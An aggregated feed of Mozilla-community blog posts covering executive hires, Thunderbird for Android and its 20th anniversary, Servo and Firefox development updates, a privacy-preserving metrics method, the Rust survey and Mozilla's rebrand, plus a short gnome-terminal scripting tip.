The Mozilla Blog: Mozilla welcomes new executive team members

I am excited to announce that three exceptional leaders are joining Mozilla to help drive the continued growth of Firefox and increase our systems and infrastructure capabilities. 

For Firefox, Anthony Enzor-DeMeo will serve as Senior Vice President of Firefox, and Ajit Varma will take on the role of our new Vice President of Firefox Product. Both bring with them a wealth of experience and expertise in building product organizations, which is critical to our ongoing efforts to expand the impact and influence of Firefox. 

The addition of these pivotal roles comes on the heels of a year full of changes, successes and celebrations for Firefox — leadership transitions, mobile growth, impactful marketing campaigns in both North America and Europe, and the marking of 20 years as the browser that prioritizes privacy and that millions of people choose daily. 

As Firefox Senior Vice President, Anthony will oversee the entire Firefox organization and drive overall business growth. This includes supporting our back-end engineering efforts and setting the overall direction for Firefox. In his most recent role as Chief Product and Technology Officer at Roofstock, Anthony led the organization through a strategic acquisition that greatly enhanced the product offering. He also served as Chief Product Officer at Better, and as General Manager, Product, Engineering & Design at Wayfair. Anthony is a graduate of Champlain College in Vermont, and has an MBA from the Sloan School at MIT. 

In his role as Vice President of Firefox Product, Ajit will lead the development of the Firefox strategy, ensuring it continues to meet the evolving needs of current users, as well as those of the future. Ajit has years of product management experience from Square, Google, and most recently, Meta, where he was responsible for monetization of WhatsApp and overseeing Meta’s business messaging platform. Earlier in his career, he was a co-founder and CEO of Adku, a venture-funded recommendation platform that was acquired by Groupon. Ajit has a BS from the University of Texas at Austin. 

We are also adding to our infrastructure leadership. As Senior Vice President of Infrastructure, Girish Rao is responsible for Platform Services, AI/ML Data Platform, Core Services & SRE, IT Services and Security, spanning Corporate and Product technology and services. His focus is on streamlining tools and services that enable teams to deliver products efficiently and securely. 

Previously, Girish led the Platform Engineering and Operations team at Warner Bros Discovery for their flagship streaming product Max. Prior to that, he led various digital transformation initiatives at Electronic Arts, Equinix Inc and Cisco. Girish’s professional journey spans various market domains (OTT streaming, gaming, blockchain, hybrid cloud data centers and more), where he has leveraged technology to solve large-scale, complex problems and deliver customer and business outcomes.  

We are thrilled to add to our team leaders who share our passion for Mozilla, and belief in the principles of our Manifesto — that the internet is a vital public resource that must remain open, accessible, and secure, enriching individuals’ lives and prioritizing their privacy.

The post Mozilla welcomes new executive team members appeared first on The Mozilla Blog.

The Mozilla Blog: Jay-Ann Lopez, founder of Black Girl Gamers, on creating safe spaces in gaming

Jay-Ann Lopez, founder of Black Girl Gamers, a group of 10,000+ Black women around the world with a shared passion for gaming.

Here at Mozilla, we are the first to admit the internet isn’t perfect, but we know the internet is pretty darn magical. The internet opens up doors and opportunities, allows for human connection, and lets everyone find where they belong — their corners of the internet. We all have an internet story worth sharing. In My Corner Of The Internet, we talk with people about the online spaces they can’t get enough of, the sites and forums that shaped them, and what reclaiming the internet really looks like.

This month, we caught up with Jay-Ann Lopez, founder of Black Girl Gamers, a group of 10,000+ Black women around the world with a shared passion for gaming. We talked to her about the internet rabbit holes she loves diving into (octopus hunting, anyone?), her vision for more inclusive digital spaces, and what it means to shape a positive online community in a complex industry.

What is your favorite corner of the internet? 

Definitely Black Girl Gamers! It’s a community-focused company and agency housing the largest network of Black women gamers. We host regular streams on Twitch, community game nights, and workshops that are both fun and educational—like making games without code or improving presentation skills. We’ve also established clear community guidelines to make it a positive, safe space, even for me as a founder. Some days, I’m just there as another member, playing and relaxing.

Why did you start Black Girl Gamers?

In 2015, I was gaming on my own and wondered where the other Black women gamers were. I created a gaming channel but felt isolated. So I decided to start a group, initially inviting others as moderators on Facebook. We’ve since grown into a platform that centers Black women and non-binary gamers, aiming not only to build a safe community but to impact the gaming industry to be more inclusive and recognize diverse gamers as a core part of the audience.

What is an internet deep dive that you can’t wait to jump back into?

I stumbled upon this video on octopuses hunting with fish, and it’s stayed on my mind! Animal documentaries are a favorite of mine, and I often dive into deep rabbit holes about ecosystems and how human activity affects wildlife. I’ll be back in the octopus rabbit hole soon, probably watching a mix of YouTube and TikTok videos, or wherever the next related article takes me.

What is the one tab you always regret closing?

Not really! I regret how long I keep tabs open more than closing them. They stick around until they’ve done their job, so there’s no regret when they’re finally gone.

What can you not stop talking about on the internet right now?

Lately, I’ve been talking about sustainable fashion—specifically how the fashion industry disposes of clothes by dumping them in other countries. I think of places like Ghana where heaps of our waste end up on beaches. Our consumer habits drive this, but we’re rarely mindful of what happens to clothes once we’re done with them. I’m also deeply interested in the intersection of fashion, sustainability, and representation in gaming.

What was the first online community you engaged with?

Black Girl Gamers was my first real community in the sense of regular interaction and support. I had a platform before that called ‘Culture’ for natural hair, which gained a following, but it was more about sharing content rather than having a true community feel. Black Girl Gamers feels like a true community where people chat daily, play together, and share experiences.

If you could create your own corner of the internet, what would it look like?

I’d want a space that combines community, education, and events with opportunities for growth. It would blend fun and connection with a mission to improve and equalize the gaming industry, allowing gamers of all backgrounds to feel valued and supported.

What articles and/or videos are you waiting to read/watch right now?

There’s a Vogue documentary that’s been on my watchlist for a while! Fashion and beauty are big passions of mine, so I’m looking forward to finding time to dive into it.

How has building a community for Black women gamers shaped your experience online as both a creator and a user?

Building Black Girl Gamers has shown me the internet’s positive side, especially in sharing culture and interests. But being in a leadership role in an industry that has been historically sexist and racist also means facing targeted harassment from people who think we don’t belong. The work I do brings empowerment, but there’s also a constant pushback, especially in the gaming space, which can make it challenging. It’s a dual experience—immensely rewarding but sometimes exhausting.


Jay-Ann Lopez is the award-winning founder of Black Girl Gamers, a community-powered platform advocating for diversity and inclusion while amplifying the voices of Black women. She is also an honorary professor at Norwich University of the Arts, a member and judge for BAFTA, and a sought-after speaker and entrepreneur.

In 2023, Jay-Ann was featured in British Vogue as a key player in reshaping the gaming industry and recognized by the Institute of Digital Fashion as a Top 100 Innovator. She speaks widely on diversity in entertainment, tech, fashion and beauty and has presented at major events like Adweek, Cannes Lions, E3, PAX East and more. Jay-Ann also curates content for notable brands including Sofar Sounds x Adidas, Warner Bros., SEGA, Microsoft, PlayStation, Maybelline, and YouTube, and co-produces Gamer Girls Night In, the first women and non-binary focused event that combines gaming, beauty and fashion.

The post Jay-Ann Lopez, founder of Black Girl Gamers, on creating safe spaces in gaming appeared first on The Mozilla Blog.

Mozilla Thunderbird: Thunderbird for Android November 2024 Progress Report

The title reads "Thunderbird for Android November 2024 Progress Report" and has both the Thunderbird and K-9 Mail logos beneath it.

It’s been a while since our last update in August, and we’re glad to be back to share what’s been happening. Over the past few months, we’ve been fully focused on the Thunderbird for Android release, and now it’s time to catch you up. In this update, we’ll talk about how the launch went, the improvements we’ve made since then, and what’s next for the project.

A Milestone Achieved

Launching Thunderbird for Android has been an important step in extending the Thunderbird ecosystem to mobile users. The release went smoothly, with no hiccups during the Play Store review process, allowing us to deliver the app to you right on schedule.

Since its launch a month ago, the response has been incredible. Hundreds of thousands of users have downloaded Thunderbird for Android, offering encouragement and thoughtful feedback. We’ve also seen an influx of contributors stepping up to make their mark on the project, with around twenty people making their first contribution to the Thunderbird for Android and K-9 Mail repository since 8.0b1. Their efforts, along with your support, continue to inspire us every day.

Listening to Feedback

When we launched, we knew there were areas for improvement. We’ve been applying our updates to both K-9 Mail and Thunderbird for Android, but a new release won’t magically fix every bug overnight. We’ve been grateful for the feedback in the beta testing group and the reviews, and especially appreciative of those of you who took a moment to show your appreciation by leaving a positive review. Your feedback has helped us focus on key issues like account selection, notifications, and app stability.

For account selection, the initial design used two-letter abbreviations from domain names, which worked for many users but caused confusion for users managing many similar accounts. A community contributor updated this to use letters from account names instead. We’re now working on adding custom icons for more personalization while keeping simple options available. Additionally, we resolved the confusing dynamic reordering of accounts, keeping them fixed while clearly indicating the active one.

Notifications have been another priority. Gmail users on K-9 faced issues due to new requirements from Google, which we’re working on. As a stopgap, we’ve added a support article, which will also be shown in the login flow from 8.2 onwards. Others have had trouble setting up push notifications or with emails not arriving immediately, which you can read more about as well. Missed system error alerts have also been a problem, so we’re planning to bring notifications into the app itself in 2025, providing a clearer way to surface and act on them.

There are many smaller issues we’ve been looking at, also with the help of our community, and we look forward to making them available to you.

Addressing Stability

App stability is foundational to any good experience, and we regularly look at the data Google provides to us. When Thunderbird for Android launched, the perceived crash rate was alarmingly high at 4.5%. We found that many crashes occurred during the first-time user experience. With the release of version 8.1, we implemented fixes that dramatically reduced the crash rate to around 0.4%. The upcoming 8.2 update will bring that number down further.

The Year Ahead

The mobile team at MZLA is heading into a well-deserved holiday break a bit early this year, but next year we’ll be back with a few projects to keep you productive while reading email on the go. Our mission is for you to fiddle less with your phone. If we can reduce the time you need between reading emails and give you ways to focus on specific aspects of your email, we can help you stay organized and make the most of your time. We’ll be sharing more details on this next year.

While we’re excited about these plans, the success of Thunderbird for Android wouldn’t be possible without you. Whether you’re using the app, contributing code, or sharing your feedback, your involvement is the lifeblood of this project.

If K-9 Mail or Thunderbird for Android has been valuable to you, please consider supporting our work with a financial contribution. Thunderbird for Android relies entirely on user funding, and your support is essential to ensure the sustainability of open-source development. Together, we can continue improving the app and building a better experience for everyone.

The post Thunderbird for Android November 2024 Progress Report appeared first on The Thunderbird Blog.

Don Marti: run a command in a tab with gnome-terminal

To start a command in a new tab, use the --tab command-line option to gnome-terminal, along with -- to separate the gnome-terminal options from the options passed to the command being run.

The script for previewing this site locally uses separate tabs for the devd process and for the script that re-runs make when a file changes.

#!/usr/bin/bash
set -e
trap popd EXIT
pushd $PWD
cd $(dirname "$0")

run_in_tab () {
    gnome-terminal --tab -- $*
}

make cleanhome # remove indexes, home page, feeds
make -j

run_in_tab devd --port 8088 public
run_in_tab code/makewatch -j pages

More: colophon

Bonus links

Deepfake YouTube Ads of Celebrities Promise to Get You ‘Rock Hard’ YouTube is running hundreds of ads featuring deepfaked celebrities like Arnold Schwarzenegger and Sylvester Stallone hawking supplements that promise to help men with erectile dysfunction. Related LinkedIn post from Jérôme Segura at Malwarebytes: In the screenshot below, we see an ad for eBay showing the https website for the real eBay site. Yet, this ad is a fake.

How DraftKings, FanDuel, Legal Sports Betting Changed the U.S., The App Always Wins (Not just a Google thing. Win-lose deals are becoming more common as a percentage of total interactions in the market. More: personal AI in the rugpull economy)

I can now run a GPT-4 class model on my laptop I’m so excited by the continual efficiency improvements we’re seeing in running these impressively capable models. In the proprietary hosted world it’s giving us incredibly cheap and fast models like Gemini 1.5 Flash, GPT-4o mini and Amazon Nova. In the openly licensed world it’s giving us increasingly powerful models we can run directly on our own devices. (Openly licensed in this context means, in comparison to API access, you get predictable pricing and no surprise nerfing. More: generative ai antimoats)

$700bn delusion: Does using data to target specific audiences make advertising more effective? Latest studies suggest not We can improve the quality of our targeting much better by just buying ads that appear in the right context, than we can by using my massive first party database to drive the buy, and it’s way cheaper to do that. Putting ads in contextually relevant places beats any form of targeting to individual characteristics. Even using your own data. (This makes sense—if the targeting data did increase return on ad spend, then the price of the data and targeting-related services would tend to go up to capture any extra value.)

Defining AI I think we should shed the idea that AI is a technological artifact with political features and recognize it as a political artifact through and through. AI is an ideological project to shift authority and autonomy away from individuals, towards centralized structures of power.

U.S. Officials Urge Americans to Use Encrypted Apps, for Texting and Calls, in Wake of Chinese Infiltration of Our Unencrypted Telecom Network (Switch from SMS to Signal is fairly common advice—the surprising part here is the source.)

Talking shit Why are people not developing a resistance to bullshit artists?

The Servo Blog: This month in Servo: :is(), :where(), grid layout, parallel flexbox, and more!

Servo nightly showing new support for CSS grid layout, when enabled via `layout.grid.enabled`

Servo now supports :is() and :where() selectors (@mrobinson, #34066), parallel layout for flexbox (@mrobinson, #34132), and experimentally, CSS grid layout (@nicoburns, @taniishkaa, #32619, #34352, #34421)! To try our new grid layout support, run Servo with --pref layout.grid.enabled.

We’ve added support for two key Shadow DOM interfaces, the shadowRoot property on Element (@simonwuelker, #34306) and the innerHTML property on ShadowRoot (@simonwuelker, #34335).

We’ve also landed ‘justify-self’ on positioned elements (@chickenleaf, #34235), form submission with <input type=image> (@shanehandley, #34203), DataTransfer (@Gae24, #34205), the close() method on ImageBitmap (@simonwuelker, #34124), plus several new SubtleCrypto API features:

On OpenHarmony, we’ve landed keyboard input and the IME (@jschwe, @jdm, @mukilan, #34188), touch fling gestures (@jschwe, @mrobinson, #33219), and additional CJK fallback fonts (@jschwe, #34410). You can now build for OpenHarmony on a Windows machine (@jschwe, #34113), and build errors have been improved (@jschwe, #34267).

More engine changes

You can now scroll the viewport and scrollable elements with your pointer anywhere in the area, not just when hovering over actual content (@mrobinson, @mukilan, #34347). --unminify-js, a very useful feature for diagnosing Servo bugs in real websites, now supports module scripts (@jdm, #34206).

We’ve fixed the behaviour of offsetLeft and offsetTop relative to <body> with ‘position: static’ (@nicoburns, @Loirooriol, #32761), which also required spec changes (@nicoburns, @Loirooriol, w3c/csswg-drafts#10549). We’ve also fixed several layout bugs around:

The getClientRects() method on Element now correctly returns a DOMRectList (@chickenleaf, #34025).

Stylo has been updated to 2024-11-01 (@Loirooriol, #34322), and we’ve landed some changes to prepare our fork of Stylo for publishing releases on crates.io (@mrobinson, @nicoburns, #34332, #34353). We’ve also made more progress towards splitting up our massive script crate (@jdm, @sagudev, #34357, #34356, #34163), which will eventually allow Servo to be built (and rebuilt) much faster.

Performance improvements

In addition to parallel layout for flexbox (@mrobinson, #34132), we’ve landed several other performance improvements:

We’ve also landed some changes to reduce Servo’s binary size:

Servo’s tracing-based profiling support (--features tracing-perfetto or tracing-hitrace) now supports filtering events via an environment variable (@delan, #34236, #34256), and no longer includes events from non-Servo crates by default (@delan, #34209). Note that when the filter matches some span or event, it will also match all of its descendants for now, but this is a limitation we intend to fix.

Most of the events supported by the old interval profiler have been ported to tracing (@delan, #34238, #34337). ScriptParseHTML and ScriptParseXML events no longer count the time spent doing layout and script while parsing, reducing them to more realistic times (@delan, #34273), while ScriptEvaluate events now count the time spent running scripts in timers, DOM event listeners, and many other situations (@delan, #34286), increasing them to more realistic times.

We’ve added new tracing events for display list building (@atbrakhi, #34392), flex layout, inline layout, and font loading (@delan, #34392). This will help us diagnose performance issues around things like caching and relayout for ‘stretch’ in flex layout, shaping text runs, and font template creation.

For developers

Hacking on Servo is now easier, with our new --profile medium build mode in Cargo (@jschwe, #34035). medium is more optimised than debug, but unlike release, it supports debuggers, line numbers in backtraces, and incremental builds.

Servo now uses CODEOWNERS to list reviewers that are experts in parts of our main repo. This should make it much easier to find reviewers that know how to review your code, and helps us maximise the quality of our code reviews by allowing reviewers to specialise.

Donations

Thanks again for your generous support! We are now receiving 4291 USD/month (+2.1% over October) in recurring donations. We are no longer accepting donations on LFX — if you were donating there, please move your recurring donations to GitHub or Open Collective.

Servo is also on thanks.dev, and already fifteen GitHub users that depend on Servo are sponsoring us there. If you use Servo libraries like url, html5ever, selectors, or cssparser, signing up for thanks.dev could be a good way for you (or your employer) to give back to the community.


With this money, we’ve been able to cover our web hosting and self-hosted CI runners for Windows and Linux builds. When the time comes, we’ll also be able to afford macOS runners and perf bots, as well as additional Outreachy interns next year! As always, use of these funds will be decided transparently in the Technical Steering Committee. For more details, head to our Sponsorship page.

Conferences and blogs

Mozilla Thunderbird: Celebrating 20 Years of Thunderbird: Independence, Innovation and Community

Thunderbird turns 20 today. Such a huge milestone invites reflection on the past and excitement for the future. For two decades, Thunderbird has been more than just an email application – it has been a steadfast companion to millions of users, offering communication, productivity, and privacy.

20 Years Ago Today…

Thunderbird’s journey began in 2003, but version 1.0 was officially released on December 7, 2004. It started as an offshoot of the Mozilla project and was built to challenge the status quo – providing an open-source, secure and customizable alternative to proprietary email clients. What began as a small, humble project soon became the go-to email solution for individuals and organizations who valued control over their data. Thunderbird was seen as the app for those in the ‘know’ and carved a unique space in the digital world.

Two Decades of Ups and Downs and Ups

The path hasn’t always been smooth. Over the years, Thunderbird faced its share of challenges – from the shifting tides of technology and billion-dollar competitors coming on the scene to trouble funding the project. In 2012, Mozilla announced that support for Thunderbird would end, leaving the project largely to fend for itself. Incredibly, a passionate group of developers, users, and supporters stepped up and refused to let it fade away. Twenty million people continued to rely on Thunderbird, believing in its potential, rallying behind it, and transforming it into a project fueled by its users, for its users.

In 2017, the Mozilla Foundation, which oversaw Thunderbird along with a group of volunteers in the Thunderbird Council, once again hired a small three-person team to work on the project, breathing new life into its development. This team decided to take matters into their own hands and let the users know through donation appeals that Thunderbird needed their support. The project began to regain strength and momentum and Thunderbird once again came back to life. (More on this story can be found in our previous post, “The History of Thunderbird.”)

The past few years, in particular, have been pivotal. Thunderbird’s user interface got a major facelift with the release of Supernova 115 in 2023. The 2024 Nebula release paid down a lot of the back-end technical debt that was holding back faster innovation and development. The first-ever Android app launched, extending Thunderbird to mobile users and opening a new chapter in its story. The introduction of Thunderbird Pro Services, including tools like file sharing and appointment booking, signals how the project is expanding to become a comprehensive productivity suite. And with that, Thunderbird is gearing up for the next era of growth and relevance.

Thank You for 20 Amazing Years

As we celebrate this milestone, we want to thank you. Whether you’ve been with Thunderbird since its earliest days or just discovered it recently, you’re part of a global movement that values privacy, independence, and open-source innovation. Thunderbird exists because of your support, and with your continued help, it will thrive for another 20 years and beyond.

Here’s to Thunderbird: past, present, and future. Thank you for being part of the journey. Together, let’s build what’s next.

Happy 20th, Thunderbird!

20 Years of Thunderbird Trivia!

It Almost Had a Different Name

Before Thunderbird was finalized, the project was briefly referred to as “Minotaur.” However, that name didn’t stick, and the team opted for something more dynamic and fitting for its vision.

Beloved By Power Users

Thunderbird has been a favorite among tech enthusiasts, system administrators, and privacy advocates because of its extensibility. With add-ons and customizations, users can tweak Thunderbird to do pretty much anything.

Supports Over 50 Languages

Thunderbird is loved world-wide! The software is available in more than 50 languages, making it accessible to users all across the globe.

Launched same year as Gmail

Thunderbird and Gmail both launched in 2004. While Gmail revolutionized web-based email, Thunderbird was empowering users to manage their email locally with full control and customization.

Donation-Driven Independence

Thunderbird relies entirely on user donations to fund its development. Remarkably, less than 3% of users donate, but their generosity is what keeps the project alive and independent for the other 97% of users.

Robot Dog Regeneration

The newly launched Thunderbird for Android is actually the evolution of the K-9 Mail project, which was acquired by Thunderbird in 2022. It was smarter to work with an existing client who shared the same values of open source, respecting the user, and offering customization and rich feature options.

The post Celebrating 20 Years of Thunderbird: Independence, Innovation and Community  appeared first on The Thunderbird Blog.

Data@Mozilla: How do we preserve the integrity of business metrics while safeguarding our users’ privacy choice?

Abstract. Respecting our users’ privacy choices is at the top of our priorities, and it also involves the deletion of their data from our Data Warehouse (DWH) when they request us to do so. For Analytics Engineering, this deletion presents the challenge of keeping business metrics reliable and stable as business analyses evolve. This blog describes our approach to breaking through this challenge. Reading time: ~5 minutes.


Mozilla has a strong commitment to protecting user privacy and giving each user control over the information that they share with us. When a user chooses to opt out of sending telemetry data, the browser sends a request that results in the deletion of the user’s records from our Data Warehouse. We call this process Shredder. The impact of Shredder becomes problematic when the reported key performance indicators (KPIs) and forecasts change after a reprocess or “backfill” of data. This limits our analytics capabilities and the evolution of our products. Yet, running a backfill is a common process that remains essential to expand our business understanding, so the question becomes: how do we rise to this challenge? Shredder Mitigation is a strategy that breaks through this problem and resolves the impact on business metrics.

Let’s see how it works with a simplified example. A table “installs” in the DWH contains telemetry data, including the install ID, browser and channel used on given dates.

installs

date install_id browser channel
2021-01-01 install-1 Firefox Release
2021-01-01 install-2 Fenix Release
2021-01-01 install-3 Focus Release
2021-01-01 install-4 Firefox Beta
2021-01-01 install-5 Fenix Release

Derived from this installs table, there is an aggregate that stores the metric “kpi_installs”, which allows us to understand the usage per browser over time and improve accordingly, and that doesn’t contain any ID or channel information.

installs_aggregates_v1

date browser kpi_installs
2021-01-01 Firefox 2
2021-01-01 Fenix 2
2021-01-01 Focus 1
Total   5

What happens when install-3 and install-5 opt out of sending telemetry data and we need to backfill? This event results in the browser sending a deletion request, which Mozilla’s Shredder process addresses by deleting existing records of these installs throughout the DWH. After this deletion, the business asks us if it’s possible to calculate kpi_installs split by channel, to evaluate beta, nightly and release separately. This means that the channel needs to be added to the aggregate and the data backfilled to recalculate the KPI. With install-3 and install-5 deleted, the backfill will report a reduced (and thus unstable) value for kpi_installs due to Shredder’s impact.

installs_aggregates (without shredder mitigation)

date browser channel kpi_installs
2021-01-01 Firefox Release 2
2021-01-01 Fenix Release 1
Total     3

How do we solve this problem? The Shredder Mitigation process safely executes the backfill of the aggregate by recalculating the KPI using only the combination of previous and new aggregate data and queries, identifying the difference in metrics caused by Shredder’s deletions and attributing that difference to a NULL dimension value. The process runs efficiently over terabytes of data, ensuring 100% stability in reported metrics and avoiding unnecessary costs by running automated data checks for each subset backfilled. Every version of our aggregates that uses Shredder Mitigation is reviewed to ensure it doesn’t contain any dimensions that could be used to identify previously deleted records. The result of a backfill with shredder mitigation in our example is a new version of the aggregate that incorporates the requested dimension “channel” and matches the reported version of the KPI:

installs_aggregates_v2

browser channel kpi_installs
Firefox Release 1
Firefox Beta 1
Fenix Release 1
Fenix NULL 1
Focus NULL 1
Total   5

With the reported metrics stable and consistent, the shredder mitigation process enables the business to safely evolve, generating knowledge in alignment with our data protection policies and safeguarding our users’ privacy choice. Want to learn more? Head over to the shredder process technical documentation for a detailed implementation guide and hands-on insights.
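
As a rough illustration of the recalculation step, here is a minimal TypeScript sketch over the tables above. The data shapes and variable names are invented for this example; the real process runs inside the DWH over terabytes of data with automated checks.

// Previously reported aggregate (installs_aggregates_v1): browser -> kpi_installs.
const previousKpi: Record<string, number> = { Firefox: 2, Fenix: 2, Focus: 1 };

// Raw installs still present after Shredder deleted install-3 and install-5.
const remainingInstalls = [
  { browser: 'Firefox', channel: 'Release' },
  { browser: 'Fenix', channel: 'Release' },
  { browser: 'Firefox', channel: 'Beta' },
];

// Recompute the aggregate at the new granularity (browser x channel).
const recomputed = new Map<string, number>();
for (const { browser, channel } of remainingInstalls) {
  const key = `${browser}|${channel}`;
  recomputed.set(key, (recomputed.get(key) ?? 0) + 1);
}

// Attribute the shortfall caused by deletions to a NULL channel, so the
// per-browser totals keep matching the previously reported KPI.
for (const [browser, reported] of Object.entries(previousKpi)) {
  const counted = [...recomputed.entries()]
    .filter(([key]) => key.startsWith(`${browser}|`))
    .reduce((sum, [, n]) => sum + n, 0);
  if (reported > counted) {
    recomputed.set(`${browser}|NULL`, reported - counted);
  }
}

// recomputed now mirrors installs_aggregates_v2:
// Firefox|Release 1, Firefox|Beta 1, Fenix|Release 1, Fenix|NULL 1, Focus|NULL 1 (total 5)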

Firefox Nightly: Learning and Improving Every Day – These Weeks in Firefox: Issue 173

Highlights

Friends of the Firefox team

Resolved bugs (excluding employees)

Volunteers that fixed more than one bug

  • Abhijeet Chawla[:ff2400t]

New contributors (🌟 = first patch)

 

Project Updates

Add-ons / Web Extensions

WebExtension APIs
WebExtensions Framework
    • Fixed a tabs events regression on extension-created tabs with a tab URL that uses an unknown protocol (e.g. an extension-registered protocol handler) – Bug 1921426
  • Thanks to John Bieling for reporting and fixing this regression
Addon Manager & about:addons
  • In the extensions panel, a new messagebar has been introduced to let users know when an extension has been disabled through the blocklist (for add-ons of type extensions disabled by either a hard or soft block) – Bug 1917848

DevTools

DevTools Toolbox

Fluent

Lint, Docs and Workflow

  • The test-manifest-toml linter has now been added to CI. This may show up in code reviews, and typically reports issues like not using double quotes, not separating skip-if conditions onto multiple lines, and incorrect ordering of tests in a file.

Migration Improvements

 

Picture-in-Picture

  • Thanks to florian for removing an unused call to Services.telemetry.keyedScalarAdd (bug 1932090), as a part of the effort to remove legacy telemetry scalar APIs (bug 1931901)
  • Also thanks to emilio for updating the PiP window to use outerHeight and outerWidth (bug 1931747), providing better compatibility for rounded PiP window corners and shadows on Windows

Search and Navigation

  • Address bar revamp (aka Scotch Bonnet project)
    • Dale disabled “interventions” results in address bar when new Quick Actions are enabled Bug 1794092
    • Dale re-enabled the Contextual Search feature Bug 1930547
    • Yazan changed Search Mode to not stick unless search terms are persisted, to avoid accidentally searching for URLs Bug 1923686
    • Daisuke fixed a problem where confirming an autofilled search keyword did not enable Search Mode Bug 1925532 
    • Daisuke made the Unified Search Button panel pick theme colors Bug 1930190
    • Daisuke improved keyboard navigation in and out of the Unified Search Button Bug 1930492, Bug 1931765
    • Emilio fixed regressions in the Address Bar alignment when the browser is full-screen Bug 1930499, and when the window is not focused Bug 1932652 
  • Search Service
  • Suggest

The Rust Programming Language Blog: Launching the 2024 State of Rust Survey

It’s time for the 2024 State of Rust Survey!

Since 2016, the Rust Project has collected valuable information and feedback from the Rust programming language community through our annual State of Rust Survey. This tool allows us to more deeply understand how the Rust Project is performing, how we can better serve the global Rust community, and who our community is composed of.

Like last year, the 2024 State of Rust Survey will likely take you between 10 and 25 minutes, and responses are anonymous. We will accept submissions until Monday, December 23rd, 2024. Trends and key insights will be shared on blog.rust-lang.org as soon as possible.

We invite you to take this year’s survey whether you have just begun using Rust, you consider yourself an intermediate to advanced user, or you have not yet used Rust but intend to one day. Your responses will help us improve Rust over time by shedding light on gaps to fill in the community and development priorities, and more.

Once again, we are offering the State of Rust Survey in the following languages (if you speak multiple languages, please pick one). Language options are available on the main survey page:

  • English
  • Simplified Chinese
  • French
  • German
  • Japanese
  • Russian
  • Spanish

Note: the non-English translations of the survey are provided in a best-effort manner. If you find any issues with the translations, we would be glad if you could send us a pull request to improve the quality of the translations!

Please help us spread the word by sharing the survey link via your social media networks, at meetups, with colleagues, and in any other community that makes sense to you.

This survey would not be possible without the time, resources, and attention of members of the Survey Working Group, the Rust Foundation, and other collaborators. We would also like to thank the following contributors who helped with translating the survey (in no particular order):

  • @albertlarsan68
  • @GuillaumeGomez
  • @Urgau
  • @Jieyou Xu
  • @llogiq
  • @avrong
  • @YohDeadfall
  • @tanakakz
  • @ZuseZ4
  • @igaray

Thank you!

If you have any questions, please see our frequently asked questions.

We appreciate your participation!

Click here to read a summary of last year's survey findings.

The Mozilla Blog: Reclaim the internet: Mozilla’s rebrand for the next era of tech

A stylized green flag on a black background, with the flag represented by a vertical line and a partial rectangle, and the "3" depicted with angular, geometric shapes.

Mozilla isn’t just another tech company — we’re a global crew of activists, technologists and builders, all working to keep the internet free, open and accessible. For over 25 years, we’ve championed the idea that the web should be for everyone, no matter who you are or where you’re from. Now, with a brand refresh, we’re looking ahead to the next 25 years (and beyond), building on our work and developing new tools to give more people the control to shape their online experiences. 

“As our personal relationships with the internet have evolved, so has Mozilla’s, developing a unique ability to meet this moment and help people regain control over their digital lives,” said Mark Surman, president of Mozilla. “Since open-sourcing our browser code over 25 years ago, Mozilla’s mission has been the same – build and support technology in the public interest, and spark more innovation, more competition and more choice online along the way. Even though we’ve been at the forefront of privacy and open source, people weren’t getting the full picture of what we do. We were missing opportunities to connect with both new and existing users. This rebrand isn’t just a facelift — we’re laying the foundation for the next 25 years.”

We teamed up with global branding powerhouse Jones Knowles Ritchie (JKR) to revamp our brand and revitalize our intentions across our entire ecosystem. At the heart of this transformation is making sure people know Mozilla for its broader impact, as well as Firefox. Our new brand strategy and expression embody our role as a leader in digital rights and innovation, putting people over profits through privacy-preserving products, open-source developer tools, and community-building efforts.

The Mozilla brand was developed with this in mind, incorporating insights from employees and the wider Mozilla community, involving diverse voices as well as working with specialists to ensure the brand truly represented Mozilla’s values while bringing in fresh, objective perspectives.

We back people and projects that move technology, the internet and AI in the right direction. In a time of privacy breaches, AI challenges and misinformation, this transformation is all about rallying people to take back control of their time, individual expression, privacy, community and sense of wonder. With our “Reclaim the Internet” promise,  a strategy built with DesignStudio in 2023,  the new brand empowers people to speak up, come together and build a happier, healthier internet — one where we can all shape how our lives, online and off, unfold. 

A close-up of a black hoodie with "Mozilla" printed in vibrant green, showcasing a modern and bold typeface.
A set of three ID badges with minimalist designs, each featuring a stylized black flag logo, a name, title, and Mozilla branding on green, black, or white backgrounds. The lanyards have "Mozilla" printed in bold text.

“The new brand system, crafted in collaboration with JKR’s U.S. and UK studios, now tells a cohesive story that supports Mozilla’s mission,” said Amy Bebbington, global head of brand at Mozilla. “We intentionally designed a system, aptly named ‘Grassroots to Government,’ that ensures the brand resonates with our breadth of audiences, from builders to advocates, changemakers to activists. It speaks to grassroots coders developing tools to empower users, government officials advocating for better internet safety laws, and everyday consumers looking to reclaim control of their digital lives.”

A large stage presentation with a bold black backdrop featuring oversized white typography and vibrant portraits of diverse individuals set against colorful blocks. The Mozilla flag logo is displayed in the top left, with "©2025 Mozilla Corporation" on the right. A presenter stands on the stage, emphasizing a modern, inclusive, and impactful design aesthetic.
A dynamic collage of Mozilla-branded presentation slides and visuals, showcasing a mix of graphs, headlines, diverse portraits, and key messaging. Themes include "Diversity & Inclusion," "Trustworthy AI," and "Sustainability," with bold typography, a structured grid layout, green accents, and the stylized flag logo prominently featured.

This brand refresh pulls together our expanding offerings, driving growth and helping us connect with new audiences in meaningful ways. It also funnels resources back into the  research and advocacy that fuel our mission.

  • The flag symbol highlights our activist spirit, signifying a commitment to ‘Reclaim the Internet.’ It is a symbol of belief, peace, unity, pride, celebration and team spirit—built from the ‘M’ for Mozilla and a pixel that is conveniently displaced to reveal a wink to Mozilla’s iconic Tyrannosaurus rex symbol designed by Shepard Fairey. The flag can also transform into a more literal interpretation as a new mascot in ASCII art style, and serve as a rallying cry for our cause.
  • The bespoke wordmark is built from an innovative semi-slab typeface with its own custom characters. It complements the flag symbol and is completely true to Mozilla.
  • The colors start with black and white — a no-nonsense, sturdy base. A wider green palette evokes nature and the nonprofits that make it their mission to better the world, a nod to making the internet a better place for all.
  • The custom typefaces are an evolution of Mozilla’s slab serif of today and stand out in a sea of tech sans serifs. The new interpretation is more innovative and built for its tech platforms. The sans brings character to something that was once hardworking but generic. These fonts are interchangeable and allow for a greater degree of expression across the brand experience, connecting everything together.
  • Our new unified brand voice makes its expertise accessible and culturally relevant, using humor to drive action.
  • Icons inspired by the flag symbol connect to the broader identity system. Simplified layouts use a modular system underpinned by a square pixel grid.

